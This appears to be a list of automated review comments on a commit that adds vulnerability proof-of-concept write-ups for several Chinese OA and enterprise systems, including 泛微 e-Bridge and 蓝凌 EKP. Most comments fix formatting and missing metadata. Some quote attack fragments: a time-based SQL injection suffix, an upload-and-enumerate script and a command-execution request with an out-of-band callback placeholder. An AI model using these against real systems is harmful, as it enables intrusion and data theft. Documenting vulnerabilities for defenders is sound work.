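Review bot: `易捷OA协同办公软件ShowPic接口存在任意文件读取.md` tags the FOFA fence `java` and the HTTP fence `js`; neither fits, and across this commit `yaml`, `java`, `js` and `python` are used interchangeably for the same two kinds of block, so settle on one convention (`yaml` for FOFA queries, `http` for requests) and apply it to every new file. This entry also gives no affected version and no source.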
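Review bot: `泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md`: the sample request terminates the multipart body with `------WebKitFormBoundaryDOVhr5SwLI1wpry7--` after the first part and then continues with a second part, so the documented request and the `## 脚本` version (which uses a plain `--boundary` separator between the two parts) disagree; the script's form is the consistent one and the request should match it. In the script, `proxies` is built but never passed to `requests.post`, `Content-Length` is set by hand although `requests` computes it, the uploaded marker is stored as an unexplained base64 string (comment what it decodes to), and the `/upload/<YYYYMM>/<A..ZZ>/` path enumeration that follows the upload is not mentioned anywhere in the prose. The sample request also ships a realistic-looking `EBRIDGE_JSESSIONID` value; use an obvious placeholder. Finally, the query parameter is spelled `fileElementld` (lower-case L) in both the request and the script; confirm that this is the product's real parameter name rather than a transcription error. The request fence should be `http`; the `python` tag on the script is right.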
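Review bot: `满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md` wraps its whole description in `**…**` and ends it with an ASCII period; no other entry bolds its description, so drop the emphasis and use `。`. The request sends `record=` with an empty value, which the text should say is intentional, since a reader will otherwise assume a value was lost; and `Host: 127.0.0.1` breaks the blank-`Host:` convention used elsewhere in this commit. Affected version and source are missing.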
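Review bot: `蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md`: the request line contains a literal space inside the request-target (`...'0:0:5'-- + HTTP/1.1`), so as written it parses as `GET <target> + HTTP/1.1` and is not a valid request; percent-encode the target or state that the trailing `-- +` belongs to the query. The User-Agent value `rv:109.0)Gecko/20100101` is missing a space. The PoC is a five-second time-based check, which is worth stating in the prose so a defender knows the artefact to look for is a slow `UniformEntry.aspx` response rather than an error. Affected versions and the XVE advisory link are not given.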
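Review bot: `蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md` describes the issue in a single sentence (`蓝凌 EKP dataxml.tmpl存在命令执行漏洞。`) with no affected version, no fix reference and no source, the thinnest entry in this commit. The body uses `{{interactsh-url}}` without saying it is a template placeholder for an out-of-band callback host, and the multi-line `script=` value is shown unencoded while `Content-Length: 192` is declared, so the two cannot both be accurate after substitution; either note that the body is illustrative or drop the hand-set length. Both fences are tagged `python` for a FOFA query and an HTTP request.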
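Review bot: `赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md` opens with a level-2 heading (`## 赛蓝...`) whereas every other file uses a level-1 title; change it to `#`. The description names 数据库配置文件 twice (`(如数据库配置文件、系统配置文件)、数据库配置文件等等`); remove the repeat. `Host: ip` is a third Host placeholder style alongside blank and `127.0.0.1`; pick one for the whole collection. The commit also mixes files that end without a newline (several hunks show `\ No newline at end of file`) with files that end on a blank line; normalise trailing newlines across the new files.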